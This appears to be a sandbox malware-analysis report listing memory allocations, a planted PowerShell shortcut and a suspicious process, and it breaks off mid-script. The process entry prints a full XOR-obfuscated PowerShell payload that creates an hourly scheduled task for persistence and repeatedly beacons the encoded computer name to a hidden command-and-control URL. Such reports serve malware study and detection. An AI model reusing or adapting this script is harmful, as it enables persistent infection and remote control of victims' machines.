NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05104000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05105000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05106000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05107000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05108000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05109000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05110000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05111000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	PowerShell $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) \| Get-Random -Count $Ube5aXEYlM7 \| % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = [System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] = 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] = 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = 